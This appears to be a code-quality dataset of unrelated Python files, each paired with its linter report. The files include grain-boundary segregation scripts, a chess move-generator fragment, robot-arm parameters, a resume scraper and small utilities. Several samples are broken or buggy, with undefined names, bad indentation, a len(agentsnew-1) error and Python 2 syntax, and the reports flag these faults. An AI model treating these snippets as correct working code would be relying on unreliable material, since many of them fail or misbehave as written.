74 ----------
75 energies : Energies obtained from simulations
76 col_num : Segregation energy column number
77 NDIGITS : Number of digits to consider when looking at unique segregation
78 energies
79
80 Returns
81 -------
82 DE_seg_i_GB : Segregation energy of site type i
83 N_hat_i_GB : Number of occurences of the segregation energy of site type i
84 num_site_types : Total number of unique site types
85 site_type_ind : Indices of matching energies between DE_seg_i_GB array and energies array
86
87 '''
88
89 # Round energies by the given number of digits, and then find number of unique energies and number of occurences
90 DE_seg_i_GB,N_hat_i_GB = np.unique(np.round(energies[np.nonzero(energies[:,col_num]),col_num],NDIGITS), return_counts=True)
91 # Number of site types
92 num_site_types = int(np.size(DE_seg_i_GB))
93 # We will use the site_type_ind list to match the site types between GBs and FSs.
94 site_type_ind = []
95 # Now that we have matched the rounded energies, find originals and put back into DE_seg_i_GB array
96 for i in range(num_site_types):
97 site_type_ind.append(np.where(np.round(energies[np.nonzero(energies[:,col_num]),col_num],NDIGITS) == DE_seg_i_GB[i])[1][0])
98 DE_seg_i_GB[i] = energies[site_type_ind[i],col_num]
99 return (DE_seg_i_GB, N_hat_i_GB, num_site_types, site_type_ind)
100 # %% MAIN
101 # Read in data frames
102 df_Pop = pd.read_csv("../Results/Pop.csv",index_col = 0).astype(float)
103
104 # From data frame to arrays
105 delta_E_seg_GB_i = np.array(df_Pop['delta_E_seg_GB_i'])
106 Pi = np.array(df_Pop['Pi'])
107
108 # Round by this number when comparing energies
109 NDIGITS = 3
110
111 # Perform simulations for all given models
112 allSims = listdir('../GBs/')
113
114 # %% Create a data frame to store all results
115 # Define columns (three properties shown in Fig. 5)
116 columns_all = ["DE_hat_b","PR_hat_GB","E_hat_b"]
117 # Tilt and GB normals as indices of the data frame
118 tilt_axes = [sim.split('_')[0] for sim in allSims]
119 GB_normals = [sim.split('_')[1] for sim in allSims]
120 # Levels required for a multi index data frame
121 levels_all = list(zip(*[tilt_axes, GB_normals]))
122 # Define indices
123 index_all = pd.MultiIndex.from_tuples(levels_all, names=['Tilt', 'Normal'])
124 # Initialize the data frame
125 df_all = pd.DataFrame(index = index_all, columns=columns_all)
126
127 #%% For each sample
128 for indSim,sim in enumerate(allSims):
129
130 # Obtain GB normal and tilt axes from the folder names
131 GB_normal = str(sim.split('_')[1])
132 GB_tilt = str(sim.split('_')[0])
133
134 # Model path
135 model_path = path.join("../GBs/", str(sim) + "/")
136
137 # Read in number of GB atoms considered in the simulation
138 N_hat_GB = getNumOfAtoms(path.join(model_path, "Results/"),"GBEnergies.dat")
139
140 # Initialize an array for energies of individual sites in GB models
141 GBenergies = np.zeros((N_hat_GB,5))
142 # Initialize an array for energies of individual sites in FS models
143 FSenergies = np.zeros((N_hat_GB,5))
144
145 try:
146 # Read energies for each sample
147 getEnergies(path.join(model_path, "Results/"),"GBEnergies.dat",GBenergies)
148 getEnergies(path.join(model_path, "Results/"),"FSEnergies.dat",FSenergies)
149
150 # Sort by atom ID
151 GBenergies = GBenergies[np.argsort(GBenergies[:,0]),:]
152 FSenergies = FSenergies[np.argsort(FSenergies[:,0]),:]
153
154 # Weed out non-matching simulations (if one of two simulations per atom ID is failed)
155 # Find out the intersection vector of two arrays, then delete rows with different atom IDs
156 for ind,val in enumerate(np.asarray(np.intersect1d(GBenergies[:,0],FSenergies[:,0]),dtype=int)):
157 if (not np.searchsorted(GBenergies[:,0],val) == ind):
158 GBenergies = np.delete(GBenergies,ind,0)
159 if (not np.searchsorted(FSenergies[:,0],val) == ind):
160 FSenergies = np.delete(FSenergies,ind,0)
161
162 # Update number of atoms
163 N_hat_GB = np.size(GBenergies,axis=0)
164
165 # Find unique segregation energies and their number of occurences using segEngOcc function
166 DE_seg_i_GB, N_hat_i_GB, num_site_types_GB, site_type_ind_GB = segEngOcc(GBenergies,4,NDIGITS)
167 # Site type indices should be preserved after cleavage (See Section 4)
168 DE_seg_i_FS = FSenergies[site_type_ind_GB,4]
169 # Embrittling potencies
170 DE_b_i = GBenergies[site_type_ind_GB,4]-FSenergies[site_type_ind_GB,4]
171
172 # Site occupancies
173 P_bar_i_GB = np.zeros(num_site_types_GB)
174
175 # Obtain P_bar_i_GB from the population (closest value)
176 for i in range(num_site_types_GB): P_bar_i_GB[i] = Pi[(np.abs(delta_E_seg_GB_i - DE_seg_i_GB[i])).argmin()]
177
178 # Rescaled site occupancy for each site type i
179 PR_hat_i_GB = P_bar_i_GB/np.sum(np.multiply(P_bar_i_GB, N_hat_i_GB))
180
181 # Site specific embrittling estimator
182 E_hat_b_i = np.multiply(PR_hat_i_GB,DE_b_i)
183
184 # Sample embrittling estimator
185 E_hat_b = np.sum(np.multiply(np.multiply(PR_hat_i_GB,N_hat_i_GB),DE_b_i))/(N_hat_GB)
186
187 # Write properties to the all results data frame
188 df_all['DE_hat_b'][GB_tilt,GB_normal] = np.sum(np.mean(np.multiply(DE_b_i,N_hat_i_GB)))/N_hat_GB
189 df_all['PR_hat_GB'][GB_tilt,GB_normal] = np.sum(np.mean(np.multiply(PR_hat_i_GB,N_hat_i_GB)))/N_hat_GB
190 df_all['E_hat_b'][GB_tilt,GB_normal] = E_hat_b
191
192 except:
193 print(indSim+1,sim,"Properties not calculated!")
194 continue
195
196 # %% To csv
197 df_all.to_csv("../Results/AllResults.csv") | 43 - warning: unspecified-encoding
46 - warning: unused-variable
62 - warning: redefined-outer-name
61 - warning: unspecified-encoding
69 - warning: redefined-outer-name
90 - warning: redefined-outer-name
90 - warning: redefined-outer-name
96 - warning: redefined-outer-name
192 - warning: bare-except
|
1 # ---------------------------------------------------------------------------
2 # ---------------------------------------------------------------------------
3 # This code is a supplement for the journal article titled:
4 # "Spectrum of Embrittling Potencies and Relation to Properties of
5 # Symmetric-Tilt Grain Boundaries"
6 # ------------------
7 # This code performs the following tasks:
8 # 1) Obtains density of states from the previous step
9 # 2) Calculates Xi and Pi (check the paper for definitions) at the population
10 # level (Fig.4)
11 # 3) Write Xi and Pi calculated in this step to a data frame, to be processed
12 # at the sample level
13 # --- Definitions and Abbreviations --
14 # GB: Grain boundary
15 # FS: Free surface
16 # ------------------
17 # Authors: Doruk Aksoy (1), Rémi Dingreville (2), Douglas E. Spearot (1,*)
18 # (1) University of Florida, Gainesville, FL, USA
19 # (2) Center for Integrated Nanotechnologies, Sandia National Laboratories,
20 # Albuquerque, NM, USA
21 # (*) dspearot@ufl.edu
22 # ---------------------------------------------------------------------------
23 # ---------------------------------------------------------------------------
24 #%% Imports
25 import numpy as np
26 import pandas as pd
27
28 # %% Define functions
29 def calcXtot(delta_E_seg_GB_i,Fi,X_bulk):
30 '''
31 Calculate total solute concentration from bulk solute concentration.
32
33 Parameters
34 ----------
35 X_bulk : Bulk solute concentration
36 delta_E_seg_GB_i : All segregation energies for each site type i
37 Fi : Density of states for each site type within the population
38
39 Returns
40 -------
41 X_tot : Total solute concentration within the population
42
43 '''
44 # Number of site types
45 n_site_types = np.size(Fi,axis=0)
46 # Initialize and calculate the probability distribution function for each
47 # site type i with the given bulk concentration
48 Xi_with_bulk = np.zeros(n_site_types)
49 for i in range(n_site_types): Xi_with_bulk[i] = 1 / (1 + ((1 - X_bulk) / X_bulk) * np.exp( delta_E_seg_GB_i[i] / (kB * T)))
50 # Calculate the effective solute concentration
51 X_bar = np.sum(Fi * Xi_with_bulk)
52 # Return the total solute concentration
53 return ((1 - f_int) * X_bulk + f_int * X_bar)
54
55 def fromXtotToXbulk(delta_E_seg_GB_i,Fi,X_tot,tol):
56 '''
57 Calculate bulk solute concentration from total solute concentration using
58 midpoint trial and improvement solver.
59
60 Parameters
61 ----------
62 delta_E_seg_GB_i : All segregation energies for each site type i
63 Fi : Density of states for each site type
64 X_tot : Total solute concentration
65 tol : Tolerance
66
67 Returns
68 -------
69 If a result is found, return X_bulk.
70
71 '''
72 # Initial lower and upper estimates
73 x_lo = 0.0
74 x_hi = X_tot*2
75 # Initial guess
76 x_0 = (x_lo + x_hi)/2
77 # Calculate a trial value using calcXtot function
78 X_tot_trial = calcXtot(delta_E_seg_GB_i,Fi,x_0)
79 # Initialize iteration counter
80 iter_count = 0
81 # Maximum number of iterations
82 max_iter = 100
83 # Check if the result is within the tolerance and number of iterations
84 # is less than the maximum value
85 while((np.abs(X_tot_trial - X_tot) > tol) and (iter_count < max_iter)):
86 if(X_tot_trial > X_tot):
87 x_hi = x_0
88 x_0 = (x_hi + x_lo)/2 # Next guess
89 else:
90 x_lo = x_0
91 x_0 = (x_hi + x_lo)/2 # Next guess
92 # Calculate the new trial value using calcXtot function
93 X_tot_trial = calcXtot(delta_E_seg_GB_i,Fi,x_0)
94 # Increment the iteration counter
95 iter_count +=1
96 # Check whether a total solute concentration can be found
97 if (iter_count == max_iter):
98 print("Could not find a value.")
99 return (0)
100 else:
101 return (x_0)
102
103 def calcPopProp(delta_E_seg_GB_i,Fi,X_tot):
104 '''
105 Calculate population properties.
106
107 Parameters
108 ----------
109 delta_E_seg_GB_i : All segregation energies for each site type i
110 Fi : Density of states for each site type
111 X_tot : Total solute concentration
112
113 Returns
114 -------
115 X_bulk : Bulk solute concentration
116 Xi : Fraction of occupied type i sites
117 Pi : Solute occupancy density
118 X_bar : Effective solute concentration
119 delta_E_bar_seg_GB_i : Effective segregation energy per site type i
120 delta_E_bar_seg_GB : Total effective segregation energy
121
122 '''
123 # Calculate the bulk concentration using fromXtotToXbulk function
124 X_bulk = fromXtotToXbulk(delta_E_seg_GB_i,Fi,X_tot,1E-4)
125 # Raise an exception if a bulk solute concentration cannot be calculated with given total solute concentration
126 if (X_bulk==0):
127 raise Exception('Error: Cannot calculate a bulk solute concentration with given total solute concentration.')
128 # Calculate the site specific probability distribution function and convert it to numpy array
129 Xi = [(1/(1+ ((1-X_bulk)/X_bulk) * np.exp( delta_E_seg_GB_i[i] / (kB*T)))) for i in range(np.size(delta_E_seg_GB_i))]
130 Xi = np.array(Xi)
131 # Site occupancy
132 Pi = Fi * Xi
133 # Effective solute concentration
134 X_bar = np.sum(Pi)
135 # Effective segregation energy for each site type i
136 delta_E_bar_seg_GB_i = (1/(X_bar*(1-X_bar))) * (Fi * delta_E_seg_GB_i * Xi * (1-Xi))
137 # Effective segregation energy
138 delta_E_bar_seg_GB = np.sum(delta_E_bar_seg_GB_i)
139 # Return all calculated properties
140 return (X_bulk,Xi,Pi,X_bar,delta_E_bar_seg_GB_i,delta_E_bar_seg_GB)
141
142 # %% MAIN
143 # Read-in normalized density of states (Format: Index/Energies/Frequencies)
144 df_Fi_GB = pd.read_csv("../Results/Fi_GB.csv",index_col = 0)
145
146 # Segregation energies for each site type i
147 delta_E_seg_GB_i = np.array(df_Fi_GB['Energy'])
148 # Density of states
149 Fi = np.array(df_Fi_GB['Freq'])
150
151 # %% Variables
152 # Total solute concentration
153 X_tot = 15/100 # no of solute atoms/no of GB atoms
154 # Fraction of interface sites to all segregation sites
155 f_int = 0.162
156 # Boltzmann Constant in eV K-1
157 kB = 0.00008617333262
158 # Temperature
159 T = 300 # K
160
161 # %% Calculate properties corresponding to the GB population using calcPopProp function
162 (X_bulk,Xi,Pi,X_bar,delta_E_bar_seg_GB_i,delta_E_bar_seg_GB) = calcPopProp(delta_E_seg_GB_i,Fi,X_tot)
163
164 # %% Create a data frame with the population properties
165 df_Pop = pd.DataFrame(np.transpose([delta_E_seg_GB_i, Fi, Xi, Pi]),columns=['delta_E_seg_GB_i','Fi','Xi','Pi']).astype(float)
166 # Convert data frame to csv
167 df_Pop.to_csv("../Results/Pop.csv")
| 29 - warning: redefined-outer-name
29 - warning: redefined-outer-name
29 - warning: redefined-outer-name
51 - warning: redefined-outer-name
55 - warning: redefined-outer-name
55 - warning: redefined-outer-name
55 - warning: redefined-outer-name
97 - refactor: no-else-return
103 - warning: redefined-outer-name
103 - warning: redefined-outer-name
103 - warning: redefined-outer-name
124 - warning: redefined-outer-name
129 - warning: redefined-outer-name
132 - warning: redefined-outer-name
134 - warning: redefined-outer-name
136 - warning: redefined-outer-name
138 - warning: redefined-outer-name
127 - warning: broad-exception-raised
|
1 import pickle, random
2 t = open("test.info", "wb")
3 t.truncate(0)
4 dic = {}
5 for x in range(0, 10):
6 randomnum = random.randint(0, 100)
7 print(randomnum)
8 dic[randomnum] = bool(input("1/0 big "))
9 pickle.dump(dic, t)
10 t.close()
| 6 - warning: bad-indentation
7 - warning: bad-indentation
8 - warning: bad-indentation
2 - refactor: consider-using-with
|
1 import copy
2 import pickle
3 import random
4 import sys
5 print(" Max testing intellegence")
6 print("a simple AI simulation")
7 print("made with python version "+sys.version)
8 file = open(r"test.info", mode = "rb")
9 try:
10 testdict = pickle.load(file)
11 except EOFError:
12 pass
13 file.close()
14 global agentnum
15 agentnum = int(input("agents for MAX"))
16 class Agent(object):
17 def __init__(self, lineval):
18 self.lineval = lineval
19 self.score = 0
20 def test(self, testsheet):
21 answer = []
22 for x in testsheet:
23 if round(x) >= self.lineval:
24 answer.append(True)
25 else:
26 answer.append(False)
27 return answer
28 def reproduce(self, other):
29 us=other
30 usnums = []
31 for x in us:
32 usnums.append(x.score)
33 if usnums.index(max(usnums)) == us.index(self):
34 agentsnew = []
35 for x in range(0, agentnum-1):
36 agentsnew.append(copy.copy(self))
37 agentsnew[len(agentsnew-1)].lineval += random.randint(-1, 1)
38 agentsnew.append(self)
39 return agentsnew
40 else:
41 try:
42 return []
43 finally:
44 del self
45
46 iternum = int(input("iteration count"))
47 testque = list(testdict.keys())
48 testans = list(testdict.values())
49 agents=[Agent(random.randint(0, 100)), Agent(random.randint(0, 100)), Agent(random.randint(0, 100))]
50 for z in agents:
51 print(z.lineval)
52 for x in range(0, iternum):
53 for i in agents:
54 right = 0
55 testresults = i.test(testque)
56 for j in testresults:
57 if j == testans[testresults.index(j)]:
58 right += 1
59 i.score = right
60 for y in agents:
61 r = i.reproduce(agents)
62 if len(r) != 0:
63 print("iteration "+str(x+1)+" sucessful")
64 agents = r
65 for nz in agents:
66 print(nz.lineval)
67 print("done")
68 while True:
69 hinputnum = int(input("number"))
70 if random.choice(agents).lineval >= hinputnum:
71 print("small number")
72 else:
73 print("big number")
| 14 - warning: global-at-module-level
16 - refactor: useless-object-inheritance
22 - warning: redefined-outer-name
31 - warning: redefined-outer-name
33 - refactor: no-else-return
8 - refactor: consider-using-with
|
1 Rook, King, Pawn, Queen, Horse = ['r', 'k', 'p', 'q', 'h']
2
3 if material == Material.Queen:
4 moves = self.queen_move(turn, location)
5 if moves != []:
6 total_moves.extend(moves)
7 if material == Material.Horse:
8 moves = self.horse_move(turn, location)
9 if move != []:
10 total_moves.extend(moves)
11
12 def horse_move(self, turn, location_1):
13 moves = []
14 x = location_1[0]
15 y = location_1[1]
16 if y > 1:
17 y1 = y - 2
18 if x != 0:
19 x1 = x - 1
20 location_2 = (x1, y1)
21 if self.check_occupied_by_self(location_2) == 0:
22 move = (location_1, location_2)
23 moves.append(move)
24 if x != 8:
25 x1 = x + 1
26 location_2 = (x1, y1)
27 if self.check_occupied_by_self(location_2) == 0:
28 move = (location_1, location_2)
29 moves.append(move)
30 if y < 6:
31 y1 = y + 2
32 if x != 0:
33 x1 = x - 1
34 location_2 = (x1, y1)
35 if self.check_occupied_by_self(location_2) == 0:
36 move = (location_1, location_2)
37 moves.append(move)
38 if x != 8:
39 x1 = x + 1
40 location_2 = (x1, y1)
41 if self.check_occupied_by_self(location_2) == 0:
42 move = (location_1, location_2)
43 moves.append(move)
44 if x > 1:
45 x1 = x - 2
46 if y != 0:
47 y1 = y - 1
48 location_2 = (x1, y1)
49 if self.check_occupied_by_self(location_2) == 0:
50 move = (location_1, location_2)
51 moves.append(move)
52 if y != 8:
53 y1 = y + 1
54 location_2 = (x1, y1)
55 if self.check_occupied_by_self(location_2) == 0:
56 move = (location_1, location_2)
57 moves.append(move)
58 if x < 6:
59 x1 = x + 2
60 if y != 0:
61 y1 = y - 1
62 location_2 = (x1, y1)
63 if self.check_occupied_by_self(location_2) == 0:
64 move = (location_1, location_2)
65 moves.append(move)
66 if y != 8:
67 y1 = y + 1
68 location_2 = (x1, y1)
69 if self.check_occupied_by_self(location_2) == 0:
70 move = (location_1, location_2)
71 moves.append(move)
72 return moves
73
74 def queen_move(self, turn, location_1):
75 moves = []
76 location_2 = list(location_1)
77 rook_moves = self.rook_move(turn,location_1)
78 moves.extend(rook_moves)
79 while location_2[0] != 7 and location_2[1] != 0:
80 location_2[0] += 1
81 location_2[1] -= 1
82 if self.check_occupied_by_self(tuple(location_2)) == 0:
83 moves.append([location_1, tuple(location_2)])
84 else:
85 break
86 if self.check_occupied_by_other(tuple(location_2)) == 1:
87 break
88 location_2 = list(location_1)
89 while location_2[0] != 7 and location_2[1] != 7:
90 location_2[0] += 1
91 location_2[1] += 1
92 if self.check_occupied_by_self(tuple(location_2)) == 0:
93 moves.append([location_1, tuple(location_2)])
94 else:
95 break
96 if self.check_occupied_by_other(tuple(location_2)) == 1:
97 break
98 location_2 = list(location_1)
99 while location_2[0] != 0 and location_2[1] != 7:
100 location_2[0] -= 1
101 location_2[1] += 1
102 if self.check_occupied_by_self(tuple(location_2)) == 0:
103 moves.append([location_1, tuple(location_2)])
104 else:
105 break
106 if self.check_occupied_by_other(tuple(location_2)) == 1:
107 break
108 location_2 = list(location_1)
109 while location_2[0] != 0 and location_2[1] != 0:
110 location_2[0] -= 1
111 location_2[1] -= 1
112 if self.check_occupied_by_self(tuple(location_2)) == 0:
113 moves.append([location_1, tuple(location_2)])
114 else:
115 break
116 if self.check_occupied_by_other(tuple(location_2)) == 1:
117 break
118 return moves
119
120
121 if material == Material.Queen:
122 if side == Side.White:
123 score += 50
124 else:
125 score -= 50 | 13 - warning: bad-indentation
14 - warning: bad-indentation
15 - warning: bad-indentation
16 - warning: bad-indentation
17 - warning: bad-indentation
18 - warning: bad-indentation
19 - warning: bad-indentation
20 - warning: bad-indentation
21 - warning: bad-indentation
22 - warning: bad-indentation
23 - warning: bad-indentation
24 - warning: bad-indentation
25 - warning: bad-indentation
26 - warning: bad-indentation
27 - warning: bad-indentation
28 - warning: bad-indentation
29 - warning: bad-indentation
30 - warning: bad-indentation
31 - warning: bad-indentation
32 - warning: bad-indentation
33 - warning: bad-indentation
34 - warning: bad-indentation
35 - warning: bad-indentation
36 - warning: bad-indentation
37 - warning: bad-indentation
38 - warning: bad-indentation
39 - warning: bad-indentation
40 - warning: bad-indentation
41 - warning: bad-indentation
42 - warning: bad-indentation
43 - warning: bad-indentation
44 - warning: bad-indentation
45 - warning: bad-indentation
46 - warning: bad-indentation
47 - warning: bad-indentation
48 - warning: bad-indentation
49 - warning: bad-indentation
50 - warning: bad-indentation
51 - warning: bad-indentation
52 - warning: bad-indentation
53 - warning: bad-indentation
54 - warning: bad-indentation
55 - warning: bad-indentation
56 - warning: bad-indentation
57 - warning: bad-indentation
58 - warning: bad-indentation
59 - warning: bad-indentation
60 - warning: bad-indentation
61 - warning: bad-indentation
62 - warning: bad-indentation
63 - warning: bad-indentation
64 - warning: bad-indentation
65 - warning: bad-indentation
66 - warning: bad-indentation
67 - warning: bad-indentation
68 - warning: bad-indentation
69 - warning: bad-indentation
70 - warning: bad-indentation
71 - warning: bad-indentation
72 - warning: bad-indentation
75 - warning: bad-indentation
76 - warning: bad-indentation
77 - warning: bad-indentation
78 - warning: bad-indentation
79 - warning: bad-indentation
80 - warning: bad-indentation
81 - warning: bad-indentation
82 - warning: bad-indentation
83 - warning: bad-indentation
84 - warning: bad-indentation
85 - warning: bad-indentation
86 - warning: bad-indentation
87 - warning: bad-indentation
88 - warning: bad-indentation
89 - warning: bad-indentation
90 - warning: bad-indentation
91 - warning: bad-indentation
92 - warning: bad-indentation
93 - warning: bad-indentation
94 - warning: bad-indentation
95 - warning: bad-indentation
96 - warning: bad-indentation
97 - warning: bad-indentation
98 - warning: bad-indentation
99 - warning: bad-indentation
100 - warning: bad-indentation
101 - warning: bad-indentation
102 - warning: bad-indentation
103 - warning: bad-indentation
104 - warning: bad-indentation
105 - warning: bad-indentation
106 - warning: bad-indentation
107 - warning: bad-indentation
108 - warning: bad-indentation
109 - warning: bad-indentation
110 - warning: bad-indentation
111 - warning: bad-indentation
112 - warning: bad-indentation
113 - warning: bad-indentation
114 - warning: bad-indentation
115 - warning: bad-indentation
116 - warning: bad-indentation
117 - warning: bad-indentation
118 - warning: bad-indentation
3 - error: undefined-variable
3 - error: undefined-variable
4 - error: undefined-variable
4 - error: undefined-variable
4 - error: undefined-variable
6 - error: undefined-variable
7 - error: undefined-variable
7 - error: undefined-variable
8 - error: undefined-variable
8 - error: undefined-variable
8 - error: undefined-variable
9 - error: undefined-variable
10 - error: undefined-variable
13 - warning: redefined-outer-name
12 - refactor: too-many-branches
12 - refactor: too-many-statements
12 - warning: unused-argument
75 - warning: redefined-outer-name
74 - refactor: too-many-branches
121 - error: undefined-variable
121 - error: undefined-variable
122 - error: undefined-variable
122 - error: undefined-variable
123 - error: undefined-variable
|
1 #!python2
2
3 from __future__ import division, print_function
4
5 ################################
6 # ZSB - Opdracht 2 #
7 # umi_parameters.py #
8 # 16/06/2017 #
9 # #
10 # Anna Stalknecht - 10792872 #
11 # Claartje Barkhof - 11035129 #
12 # Group C #
13 # #
14 ################################
15
16 class UMI_parameters:
17 def __init__(self):
18 # Specifications of UMI
19 # Zed
20 self.hpedestal = 1.082 # di riser/zed in meters
21 self.pedestal_offset = 0.0675 # ai riser/zed
22 self.wpedestal = 0.1 # just leave it 0.1
23
24 # Dimensions upper arm
25 self.upper_length = 0.2535 # ai shoulder in meters
26 self.upper_height = 0.095 # di shoulder in meters
27
28 # Dimensions lower arm
29 self.lower_length = 0.2535 # ai elbow in meters
30 self.lower_height = 0.080 # di elbow in meters
31
32 # Dimensions wrist
33 self.wrist_height = 0.09 # di wrist in meters
34
35 # Height of the arm from the very top of the riser, to the tip of the gripper.
36 self.total_arm_height = self.pedestal_offset + self.upper_height \
37 + self.lower_height + self.wrist_height
38
39 # Joint-ranges in meters (where applicable e.g. Riser, Gripper) and in degrees for the rest.
40
41 ## TODO for students: REPLACE MINIMUM_DEGREES AND MAXIMUM_DEGREES FOR EACH INDIVIDUAL JOINT, THEY ARE NOT THE SAME FOR
42 # SHOULDER, ELBOW, AND WRIST
43 self.joint_ranges = {
44 "Riser" : [0.0, 0.925],
45 "Shoulder" : [-90.0, 90.0],
46 "Elbow" : [-180.0, 110.0],
47 "Wrist" : [-110.0, 110.0],
48 "Gripper" : [0, 0.05]
49 }
50
51 def correct_height(self, y):
52 '''
53 Function that corrects the y value of the umi-rtx, because the real arm runs from
54 from -self.hpedestal/2 to self.hpedestal/2, while y runs from 0 to self.hpedestal.
55 '''
56 return y - 0.5*self.hpedestal
| 41 - warning: fixme
16 - refactor: too-many-instance-attributes
16 - refactor: too-few-public-methods
|
1 # ZSB - Opdracht 2 #
2 # errorreport.py #
3 # 16/06/2017 #
4 # #
5 # Anna Stalknecht - 10792872 #
6 # Claartje Barkhof - 11035129 #
7 # Group C #
8 # #
9 ################################
10
11 '''
12 error report
13 We started implementing the board_position_to_cartesian function. This function was
14 tested by printing the cartesian values to see if thehy matched our calculation.
15 We also printed the board_position and the value of index function to see if it was working
16 correctly.
17
18 Then we implemented the high_path function which we tested by running the program and
19 pressing compute high path. We then checked the joints_simulation.txt file and saw that
20 something had changed. We couldn't really test it more because we first had to implement
21 the inverse_kinematics.
22
23 So we made the inverse_kinematics function. And now we had te possibility to test it by
24 running the program. At first the program wasn't working properly because it took chesspieces
25 from the table instead of from the chessboard. We found out that it was because we switched x
26 and z axes.
27
28 Then we tried rotating the chessboard and we found out that our board_position_to_cartesian wasn't
29 working properly. It was only working when we turned the chessboard 0 or 180 degrees. That was because
30 we walked from h8 in the right angle but it didn't work the way we want. Than we changed
31 the function so it would calculate the cartesian from the original angle (0 degrees), and than
32 calculationg that position to the new position at the right angle. Then it worked.
33
34 We then had an error rotationg the chessboard -20degrees, the shoulder_angle gave a math error.
35 That was because the arms are not big enough to reach the top of the board at that angle.
36 When placed the board closer to the gripper our program worked properly again.
37
38
39 ''' | Clean Code: No Issues Detected
|
1 import json
2 import pymongo
3 from bs4 import BeautifulSoup
4 client = pymongo.MongoClient("mongodb+srv://localhost")
5 db = client.test
6 col = db["resumes"]
7 documents = col.find({},no_cursor_timeout=True) # if limit not necessary then discard limit
8 print(type(documents))
9 new_col = db["resultResumes"]
10 for i in documents:
11 dict = {}
12 doc = i["Resume-Html"]
13 soup = BeautifulSoup(''.join(doc),features="html.parser")
14 dict['_id'] = i['_id']
15 dict['createdTime'] = i['createdTime']
16 dict['Title'] = i['Title']
17 location = soup.find('p', attrs={'class' : 'locality'})
18 if location is not None:
19 loc = location.get_text()
20 locspace = " ".join(loc.split())
21 dict['Location'] = locspace
22 else:
23 dict['Location'] = ""
24 education = soup.find('div',attrs={'class':'section-item education-content'})
25 if education is not None:
26 edu= education.get_text()
27 eduspace = " ".join(edu.split())
28 edurem = eduspace.replace('Education', '')
29 dict['Education'] = edurem
30 else:
31 dict['Education'] = ""
32
33 workexperience = soup.find('div', attrs={'class':'section-item workExperience-content'})
34 if workexperience is not None:
35 # print(workexperience.get_text())
36 bza = []
37 abcd = soup.findAll('div', attrs={'class': 'work-experience-section'})
38 k = 0
39 for j in range(len(abcd)):
40
41 print('---------------------------------------------------')
42 print(j)
43 worka = abcd[j].find('p', attrs={'class': 'work_title'})
44 if worka is not None:
45 workaa = worka.get_text()
46 workspa = " ".join(workaa.split())
47 workb = abcd[j].find('div', attrs={'class': 'work_company'})
48 if workb is not None:
49 workba = workb.get_text()
50 workspb = " ".join(workba.split())
51 workc = abcd[j].find('p', attrs={'class': 'work_dates'})
52 if workc is not None:
53 workca = workc.get_text()
54 workspc = " ".join(workca.split())
55 workd = abcd[j].find('p', attrs={'class': 'work_description'})
56 if workd is not None:
57 workda = workd.get_text()
58 workspd = " ".join(workda.split())
59 vskp = workspa + workspb + workspc + workspd
60
61 # vskp.append(wora)
62 # vskp.append(worb)
63 # vskp.append(worc)
64 # vskp.append(word)
65
66 bza.append(vskp)
67
68
69 print('---------------------------------------------------')
70 print(bza)
71
72 dict['WorkExperience'] = bza
73 else:
74 dict['WorkExperience'] = ""
75 currentcompany = soup.find('div', attrs={'class':'work_company'})
76 if currentcompany is not None:
77 company= currentcompany.get_text()
78 companyspace = " ".join(company.split())
79 dict['CurrentCompany'] = companyspace
80 else:
81 dict['CurrentCompany'] = ""
82 skills = soup.find('div', attrs={'class':'data_display'})
83 if skills is not None:
84 skill= skills.get_text()
85 skillspace = " ".join(skill.split())
86 skillarr = []
87 skillarr.append(skillspace)
88 dict['Skills'] = skillarr
89 else:
90 dict['Skills'] = ""
91 introduction = soup.find('p', attrs={'class' : 'summary'})
92 if introduction is not None:
93 introduction = introduction.get_text()
94 introductionspace = " ".join(introduction.split())
95 dict['Introduction'] = introductionspace
96 else:
97 dict['Introduction'] = ""
98
99
100 new_col.insert_one(dict)
| 11 - warning: redefined-builtin
59 - error: possibly-used-before-assignment
59 - error: possibly-used-before-assignment
59 - error: possibly-used-before-assignment
59 - error: possibly-used-before-assignment
1 - warning: unused-import
|
1 """
2 # Speaking in Tongues
3
4 ## Problem
5
6 We have come up with the best possible language here at Google, called Googlerese. To translate text into
7 Googlerese, we take any message and replace each English letter with another English letter. This mapping
8 is one-to-one and onto, which means that the same input letter always gets replaced with the same output
9 letter, and different input letters always get replaced with different output letters. A letter may be
10 replaced by itself. Spaces are left as-is.
11
12 For example (and here is a hint!), our awesome translation algorithm includes the following three mappings:
13 'a' -> 'y', 'o' -> 'e', and 'z' -> 'q'. This means that "a zoo" will become "y qee".
14
15 Googlerese is based on the best possible replacement mapping, and we will never change it. It will always be
16 the same. In every test case. We will not tell you the rest of our mapping because that would make the problem
17 too easy, but there are a few examples below that may help.
18
19 Given some text in Googlerese, can you translate it to back to normal text?
20
21 Solving this problem
22
23 Usually, Google Code Jam problems have 1 Small input and 1 Large input. This problem has only 1 Small input.
24 Once you have solved the Small input, you have finished solving this problem.
25
26 ### Input
27
28 The first line of the input gives the number of test cases, T. T test cases follow, one per line.
29
30 Each line consists of a string G in Googlerese, made up of one or more words containing the letters 'a' - 'z'.
31 There will be exactly one space (' ') character between consecutive words and no spaces at the beginning or at
32 the end of any line.
33
34 ### Output
35
36 For each test case, output one line containing "Case #X: S" where X is the case number and S is the string that
37 becomes G in Googlerese.
38
39 ### Limits
40
41 1 <= T <= 30.
42 G contains at most 100 characters.
43 None of the text is guaranteed to be valid English.
44
45 ### Sample
46
47 Input
48 3
49 ejp mysljylc kd kxveddknmc re jsicpdrysi
50 rbcpc ypc rtcsra dkh wyfrepkym veddknkmkrkcd
51 de kr kd eoya kw aej tysr re ujdr lkgc jv
52
53 Output
54 Case #1: our language is impossible to understand
55 Case #2: there are twenty six factorial possibilities
56 Case #3: so it is okay if you want to just give up
57
58 """
59
60 import string, urllib
61
62 input = 'https://raw.github.com/gist/2404633/65abea31f1a9504903f343e762d007d95ef0540a/GoogleCodeJam-SpeakingInTongues.txt'
63 decoded = string.maketrans('ynficwlbkuomxsevzpdrjgthaq', 'abcdefghijklmnopqrstuvwxyz')
64 getdata = urllib.urlopen(input).read().split('\n')[1:]
65
66 for i, j in enumerate(getdata):
67 print "Case #%d: %s" % (i+1, j.translate(decoded))
68
| 67 - error: syntax-error
|
1 def isPrime(n):
2 import re
3 return re.match(r'^1?$|^(11+?)\1+$', '1' * n) == None
| Clean Code: No Issues Detected
|
1 def mapper(function, *params):
2 rez = []
3 for args in zip(*params):
4 rez.append(function(*args))
5 return rez
6
7 print mapper(abs, [-3, 5, -1, 42, 23])
8 print mapper(pow, [1, 2, 3], [2, 3, 4, 5]) | 7 - error: syntax-error
|
1 import subprocess
2
3 def shell(command, stdout=True):
4 if stdout:
5 return subprocess.check_output(command, shell=True)
